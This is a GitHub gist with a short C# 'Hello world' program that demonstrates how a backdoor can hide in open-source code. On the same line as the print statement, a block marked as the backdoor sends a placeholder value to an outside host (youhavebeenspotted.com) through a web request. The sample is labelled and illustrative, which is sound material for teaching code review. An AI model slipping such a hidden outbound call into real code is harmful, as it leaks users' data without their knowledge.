Skip to content

Instantly share code, notes, and snippets.

@yuri-tikhomirov
Created October 5, 2019 23:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save yuri-tikhomirov/eb398e68d67c0e8e1cf3b6d319fc18a4 to your computer and use it in GitHub Desktop.
Save yuri-tikhomirov/eb398e68d67c0e8e1cf3b6d319fc18a4 to your computer and use it in GitHub Desktop.
class Program
{
static void Main()
{
// it seems to be this opensource code can not have any backdoors?..
System.Console.WriteLine("Hello world!"); { /* HERE's the backdoor!! */ var data = "something"; System.Net.WebRequest.Create("http://youhavebeenspotted.com/?some=" + data).GetResponseAsync(); }
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment